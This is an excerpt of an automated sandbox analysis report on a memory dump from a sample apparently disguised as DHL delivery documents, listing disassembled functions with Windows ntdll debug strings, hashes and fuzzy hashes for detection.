                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                        • API String ID: 0-1239276146
                        • Opcode ID: f0d826ad6db74f59f4204498f930acad5a25f58c10f43583efdde26e71d82cff
                        • Instruction ID: d37bf624fad41970d3a6efd36f3a833d64faace2f36fcefb3116927a1b06e1bd
                        • Opcode Fuzzy Hash: f0d826ad6db74f59f4204498f930acad5a25f58c10f43583efdde26e71d82cff
                        • Instruction Fuzzy Hash: 5EA1DF35904229DBDB24DF69DC89BA9B7B0BF68354F1501EAE908A7251D730DF80CF90
                        Function 01C44AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                        Download Yara Rule
                        Strings
                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01C83437
                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01C83456
                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01C8342A
                        • RtlDeactivateActivationContext, xrefs: 01C83425, 01C83432, 01C83451
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                        • API String ID: 0-1245972979
                        • Opcode ID: 4d15e46c91bb51e429d2a7a6b759a322b4634712eb8be39b21677a5420619d5c
                        • Instruction ID: 0c4f6cac29aee2a7925ab25a2b4a768de357e71f181439cc8f9e406eb8568aec
                        • Opcode Fuzzy Hash: 4d15e46c91bb51e429d2a7a6b759a322b4634712eb8be39b21677a5420619d5c
                        • Instruction Fuzzy Hash: DD615536604B52DFD72ADF1DC881B2ABBE1FF80B64F28851DE9559B250D730E900CB95
                        Function 01C164AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                        Download Yara Rule
                        Strings
                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01C70FE5
                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01C7106B
                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01C710AE
                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01C71028
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                        • API String ID: 0-1468400865
                        • Opcode ID: 4dee800ec9fa5e3759467ef06f157680db840de3586927b0da4ae9acb2969c25
                        • Instruction ID: a79ff51a0ab9d0ea17848581e6474e06f62a7de8c163269276c0275098527dc1
                        • Opcode Fuzzy Hash: 4dee800ec9fa5e3759467ef06f157680db840de3586927b0da4ae9acb2969c25
                        • Instruction Fuzzy Hash: A771E2B1944315EFCB21DF19C884B9B7FA8AF95754F000468FD498B28AD374D688EBD2
                        Function 01C3245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                        Download Yara Rule
                        Strings
                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01C7A992
                        • minkernel\ntdll\ldrinit.c, xrefs: 01C7A9A2
                        • apphelp.dll, xrefs: 01C32462
                        • LdrpDynamicShimModule, xrefs: 01C7A998
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                        • API String ID: 0-176724104
                        • Opcode ID: 250a49c9c9e6a46dc488f12c39f9cad1539951b359b2331afbabe00e7031d6a7
                        • Instruction ID: 58320c5235bc874855f748f131c67944849d1b4a7fb904db1164250430b106d9
                        • Opcode Fuzzy Hash: 250a49c9c9e6a46dc488f12c39f9cad1539951b359b2331afbabe00e7031d6a7
                        • Instruction Fuzzy Hash: 8C314871600201EFDB36AF6E9885B6EB7B4FB84B10F190059E90067355C7B0DAA1DB80
                        Function 01C229A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                        Download Yara Rule
                        Strings
                        • HEAP: , xrefs: 01C23264
                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01C2327D
                        • HEAP[%wZ]: , xrefs: 01C23255
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                        • API String ID: 0-617086771
                        • Opcode ID: 86f76bc6ec4e4406fd055504f9a55a4bd866c61675830cef7b6f561d65afa16b
                        • Instruction ID: e62ee5679b12b81dbf99f011e708ed2413d9ad4f10fabb980ec22a79ec9cbe73
                        • Opcode Fuzzy Hash: 86f76bc6ec4e4406fd055504f9a55a4bd866c61675830cef7b6f561d65afa16b
                        • Instruction Fuzzy Hash: B392AB71A042A9DFDB25CF69C444BAEBBF1FF48300F148099E94AAB751D739EA41CB50
                        Function 01C20770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                        • API String ID: 0-4253913091
                        • Opcode ID: bb8b2228179250fb641e8065f08d5a9a25728448f6b7e0e09b0baf6b1324c1d4
                        • Instruction ID: a79329fd9a7397e6e18d2d5f11fdc4208a40f14567b8bafaeeb1a1e9cc08879a
                        • Opcode Fuzzy Hash: bb8b2228179250fb641e8065f08d5a9a25728448f6b7e0e09b0baf6b1324c1d4
                        • Instruction Fuzzy Hash: 7FF1DE30B00656DFEB26CF69C884B6ABBF5FF44700F14816AE5069B391D770EA91CB90
                        Function 01C36962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: $@
                        • API String ID: 0-1077428164
                        • Opcode ID: e70368b42ad1d42d18fabee849959430192e71f8c674c6c4e89f66a2ab2b8e02
                        • Instruction ID: 02f57e3a64c757a9d6538d3baf998bdb646d15b6835c3e26f69b2886c2218928
                        • Opcode Fuzzy Hash: e70368b42ad1d42d18fabee849959430192e71f8c674c6c4e89f66a2ab2b8e02
                        • Instruction Fuzzy Hash: 1DC29FB1608392DFDB25CF29C880BABBBE5AFC8754F04892DF98987241D774D944CB52
                        Function 01C0A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: FilterFullPath$UseFilter$\??\
                        • API String ID: 0-2779062949
                        • Opcode ID: 1abe1ae815e31ab7d0cc40b681dea771ece34da57d47dcd482ae3e8d09b17732
                        • Instruction ID: b3cceb0a52900193f9e2cf95605c9572dcadfcebb8b936560e8e28d2289cee87
                        • Opcode Fuzzy Hash: 1abe1ae815e31ab7d0cc40b681dea771ece34da57d47dcd482ae3e8d09b17732
                        • Instruction Fuzzy Hash: 59A12771911629DBDB21DB68CC88BAAB7B8EB48710F1041EAEA09A7250D735DF84CF54
                        Function 01C30BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                        Download Yara Rule
                        Strings
                        • Failed to allocated memory for shimmed module list, xrefs: 01C7A10F
                        • minkernel\ntdll\ldrinit.c, xrefs: 01C7A121
                        • LdrpCheckModule, xrefs: 01C7A117
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                        • API String ID: 0-161242083
                        • Opcode ID: 96a72ae6021b9a437639ebedfd5101fcd5bccdd62641f872ec2484289a95cfad
                        • Instruction ID: 4bfabce72d75f13c72a443cc6e7edb77441e7db361db74a7782058143e8fec8d
                        • Opcode Fuzzy Hash: 96a72ae6021b9a437639ebedfd5101fcd5bccdd62641f872ec2484289a95cfad
                        • Instruction Fuzzy Hash: 6A71EF71A00205DFDB2AEF69D880BAEB7F4FB84604F18402DE802A7351E774EE51CB51
                        Function 01C20A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                        • API String ID: 0-1334570610
                        • Opcode ID: f035545e08f57042106bf8b07b4e21923d003a52146f61dd1004d69bd59fa715
                        • Instruction ID: 606c7bd975423f979d65713325f00bc83553a728348a5cc660c07ad22c6d538f
                        • Opcode Fuzzy Hash: f035545e08f57042106bf8b07b4e21923d003a52146f61dd1004d69bd59fa715
                        • Instruction Fuzzy Hash: F361DD70600352DFDB29CF28C481B6ABBF1FF44704F14856AE9598F692D7B0E9A1CB91
                        Function 01C4C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                        Download Yara Rule
                        Strings
                        • minkernel\ntdll\ldrinit.c, xrefs: 01C882E8
                        • Failed to reallocate the system dirs string !, xrefs: 01C882D7
                        • LdrpInitializePerUserWindowsDirectory, xrefs: 01C882DE
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                        • API String ID: 0-1783798831
                        • Opcode ID: f040b35132560436817faf500dbd17a78b8a31bc23a0f06f2a7ebef3fbe88c60
                        • Instruction ID: 967925cedd66b6cdbc6bbfab4ca4ffbf403f55fc72bfba5bd6cf021192bd250d
                        • Opcode Fuzzy Hash: f040b35132560436817faf500dbd17a78b8a31bc23a0f06f2a7ebef3fbe88c60
                        • Instruction Fuzzy Hash: 93413171549301EBD732EB68DC80B5B7BE8EF48754F40492AF948D32A1E770E910CB95
                        Function 01CCC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                        Download Yara Rule
                        Strings
                        • PreferredUILanguages, xrefs: 01CCC212
                        • @, xrefs: 01CCC1F1
                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01CCC1C5
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                        • API String ID: 0-2968386058
                        • Opcode ID: d9877e888eaf38bd4f693aa7a6adc314f2c94f3f279b80a316acf5e3830399e2
                        • Instruction ID: c55bc0c85305ac7f96c8a3559d402e09a685f5094b44d3da4ae7f0551d13758c
                        • Opcode Fuzzy Hash: d9877e888eaf38bd4f693aa7a6adc314f2c94f3f279b80a316acf5e3830399e2
                        • Instruction Fuzzy Hash: 70417071E0021AEBDF11DAD8C851BEEBBB9AB14B00F00406EEA0AE7290D774DE44DB54
                        Function 01CA4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                        • API String ID: 0-1373925480
                        • Opcode ID: 94aac18bc5f85ccb8799dae7f259e1cc9a9b7456f5ea3150e05747d67fe35c8b
                        • Instruction ID: 8078b9cb194b8b392af27f6789f82e4bb083b14a62fd8a1249340f9e82529808
                        • Opcode Fuzzy Hash: 94aac18bc5f85ccb8799dae7f259e1cc9a9b7456f5ea3150e05747d67fe35c8b
                        • Instruction Fuzzy Hash: 6341373190035ACBEB2ADBE9C844BACBBB4FF55348F580569DA01EB381D7B4D901CB11
                        Function 01C94755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                        Download Yara Rule
                        Strings
                        • minkernel\ntdll\ldrredirect.c, xrefs: 01C94899
                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01C94888
                        • LdrpCheckRedirection, xrefs: 01C9488F
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                        • API String ID: 0-3154609507
                        • Opcode ID: 2f7c6774f258cf9575215ecb081ff0f5c1a2335e569c606e8ae2122b14cacaf9
                        • Instruction ID: da8c15f003a438a3518bb5f5901c57142b2ce90256ae1dbe3a1a276e650a86e3
                        • Opcode Fuzzy Hash: 2f7c6774f258cf9575215ecb081ff0f5c1a2335e569c606e8ae2122b14cacaf9
                        • Instruction Fuzzy Hash: E041E232A04351DFCF2ACE5DDA48A2A7BE4EF89A54F05055DED48DB311D730D912CB85
                        Function 01C20BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                        • API String ID: 0-2558761708
                        • Opcode ID: 179013bbaeb268553286e0243aa892bbd5b4abbaabfbc9b8f02a48b3f920324c
                        • Instruction ID: 77eaef756f7b9f982b53aa4b0aca74c9b891a99a1b51925d4a7735acf2e6422d
                        • Opcode Fuzzy Hash: 179013bbaeb268553286e0243aa892bbd5b4abbaabfbc9b8f02a48b3f920324c
                        • Instruction Fuzzy Hash: 84110031354152DFDB2ECB29D444B7AB3A4EF4061AF18816EF406CB691DB70EC50CB54
                        Function 01C920DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                        Download Yara Rule
                        Strings
                        • minkernel\ntdll\ldrinit.c, xrefs: 01C92104
                        • Process initialization failed with status 0x%08lx, xrefs: 01C920F3
                        • LdrpInitializationFailure, xrefs: 01C920FA
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                        • API String ID: 0-2986994758
                        • Opcode ID: c9e5ed5baf376a27aed6b0d2cac2f0b2cd3fdbade60d172fc846b1383f6ed246
                        • Instruction ID: faf3403f8b60a0fdac7ab5a7d43e08c424495b565df23e0652487e4f330d98fa
                        • Opcode Fuzzy Hash: c9e5ed5baf376a27aed6b0d2cac2f0b2cd3fdbade60d172fc846b1383f6ed246
                        • Instruction Fuzzy Hash: F4F0C875650308FFEB28E68DDC47F963768EB40B54F10009DFB4067281E3B0EA64D691
                        Function 01C203E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID: #%u
                        • API String ID: 48624451-232158463
                        • Opcode ID: c124dcf0a9326e02170f927d7ed64ffc0a5ca631e5624930271dc1fc7527da52
                        • Instruction ID: 1b57493737edb9036c4f05ab71242ddd98642a3d8362f439bca213833f5a4e7d
                        • Opcode Fuzzy Hash: c124dcf0a9326e02170f927d7ed64ffc0a5ca631e5624930271dc1fc7527da52
                        • Instruction Fuzzy Hash: F9714771A0015ADFDB05DFA8C984BAEBBF8BF18304F144065E905E7251EA78EE51CBA1
                        Function 01C1A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                        Download Yara Rule
                        Strings
                        • LdrResSearchResource Enter, xrefs: 01C1AA13
                        • LdrResSearchResource Exit, xrefs: 01C1AA25
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                        • API String ID: 0-4066393604
                        • Opcode ID: 8d64964c6165ad7474423dd29d01e3b18ff02265523b7939da448970d48c2463
                        • Instruction ID: 9b6a0c917af004ad70c67f9ff493ca9c8b8b12393369f9aee5f833e38b03bb26
                        • Opcode Fuzzy Hash: 8d64964c6165ad7474423dd29d01e3b18ff02265523b7939da448970d48c2463
                        • Instruction Fuzzy Hash: 64E1A271E41299EFEF22CE99C984BAEBBB9FF06310F144426E901E7245D774DA40EB50
                        Function 01CDA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: `$`
                        • API String ID: 0-197956300
                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                        • Instruction ID: 1582fad31ecd12af8fd073a7b3663069823f042f1cdb3b684f4250ffb926e351
                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                        • Instruction Fuzzy Hash: DFC1BE31204342DBEB25CF29C845B6BBBE5AFC4718F084A2DF7968B290D774D645CB82
                        Function 01C8E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: Legacy$UEFI
                        • API String ID: 2994545307-634100481
                        • Opcode ID: 1875c29866314e32378517666ae02ceb410e144963f7424c858f62c6dfd01c06
                        • Instruction ID: 91bdaf4ad4e181e797f1776c4c81da0bd4d37e2ef6b58c53970ea1b6e36a3199
                        • Opcode Fuzzy Hash: 1875c29866314e32378517666ae02ceb410e144963f7424c858f62c6dfd01c06
                        • Instruction Fuzzy Hash: 79614B71E10219DFDB24EFA9C980BAEBBB9FB44704F14446DEA49EB251D731E940CB50
                        Function 01CB43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: @$MUI
                        • API String ID: 0-17815947
                        • Opcode ID: 9b68b51e1d258481a780d11285dc625404d2771a2440e937f27ec4ae2fd1367f
                        • Instruction ID: 8b2cfea722dc89cc07d0afd5d7fbb507860e59d336dc557862bce8df4bea8eac
                        • Opcode Fuzzy Hash: 9b68b51e1d258481a780d11285dc625404d2771a2440e937f27ec4ae2fd1367f
                        • Instruction Fuzzy Hash: F7512771E0061DEFDB15DFA9CC80AEEBBB8EB48754F100529EA12E7281D634DA45DB60
                        Function 01C104E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                        Download Yara Rule
                        Strings
                        • kLsE, xrefs: 01C10540
                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01C1063D
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                        • API String ID: 0-2547482624
                        • Opcode ID: 884486ad1f1f63849fc75436c9133c917aef2b386be8a0184244d8d431839e54
                        • Instruction ID: 2c7ad377a0e2b55bc39421c3c32acfe8bde2c54d744cbe6ae4496a7f4e6633bb
                        • Opcode Fuzzy Hash: 884486ad1f1f63849fc75436c9133c917aef2b386be8a0184244d8d431839e54
                        • Instruction Fuzzy Hash: FA51FF71580742CFC725EF28C4446A3BBE4AF86300F104C3EFA9A87245E730DA95DB92
                        Function 01C1A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                        Download Yara Rule
                        Strings
                        • RtlpResUltimateFallbackInfo Enter, xrefs: 01C1A2FB
                        • RtlpResUltimateFallbackInfo Exit, xrefs: 01C1A309
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                        • API String ID: 0-2876891731
                        • Opcode ID: aadd1e9b975b8250f91fd22ee74f39d216d82ccead01e1fea148ca2f05b0f119
                        • Instruction ID: e9688a429a70bf1d47614d95bc8341a5f7817cdf8cd0dc2db3558b5544605263
                        • Opcode Fuzzy Hash: aadd1e9b975b8250f91fd22ee74f39d216d82ccead01e1fea148ca2f05b0f119
                        • Instruction Fuzzy Hash: DB41F170A41289CBDB21CF69C440B6D7BB4FF86B00F1440A9E901DB755E3B5DA00DB50
                        Function 01C4A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: Cleanup Group$Threadpool!
                        • API String ID: 2994545307-4008356553
                        • Opcode ID: d470d97c7d02b423bbc26867ba38ec418c82fe4211e86c167985235468b611c6
                        • Instruction ID: c76f0cd86f1e00d27fa77137f50049d651ea60e94f82d77b3ea1555be419c62d
                        • Opcode Fuzzy Hash: d470d97c7d02b423bbc26867ba38ec418c82fe4211e86c167985235468b611c6
                        • Instruction Fuzzy Hash: D80128B2284704EFD321DF14CD49F5677E8E784719F008979B649C7190E774D814CB4A
                        Function 01C1C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: MUI
                        • API String ID: 0-1339004836
                        • Opcode ID: 6af24f28fd9bbe896b4ae5ef7c3761d396aeb779283c635cfc7f9fb12fa3c136
                        • Instruction ID: 5d99ce799d66e9f32d16df339bca8c814f5c12c2809a66d3e3ac0f2c47e9b70a
                        • Opcode Fuzzy Hash: 6af24f28fd9bbe896b4ae5ef7c3761d396aeb779283c635cfc7f9fb12fa3c136
                        • Instruction Fuzzy Hash: B3827F75E80218CBDB25CFA9C8847EDBBB1BF46310F148169E91AAB358D730DE41EB54
                        Function 01C96420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID: 0-3916222277
                        • Opcode ID: a0e17833bbc304394bf84e30f18860e3a2f5f78f8f7fc9531279bec323adae62
                        • Instruction ID: faa8ea870347a3c845b71b8d9b1ad1c066d499c6f71fc24776a9917281760aba
                        • Opcode Fuzzy Hash: a0e17833bbc304394bf84e30f18860e3a2f5f78f8f7fc9531279bec323adae62
                        • Instruction Fuzzy Hash: B8915F71940229EFEB21DF95CD89FAEBBB8EF59B50F100065F600AB190D674ED04DBA0
                        Function 01CBE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID: 0-3916222277
                        • Opcode ID: 0ce15c0636e183ef13594ae978ffb5b7564b8b4c97e6003a3a0860fd2f8f8565
                        • Instruction ID: 3643939787c25f9662106e9b164705c7765e10ecd1e88fd3dae3b9cfb6397461
                        • Opcode Fuzzy Hash: 0ce15c0636e183ef13594ae978ffb5b7564b8b4c97e6003a3a0860fd2f8f8565
                        • Instruction Fuzzy Hash: A5919C72901609EFDB22ABA5D884FEFBB79EF85B50F100029F501E7251EB38D941DB91
                        Function 01C4A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
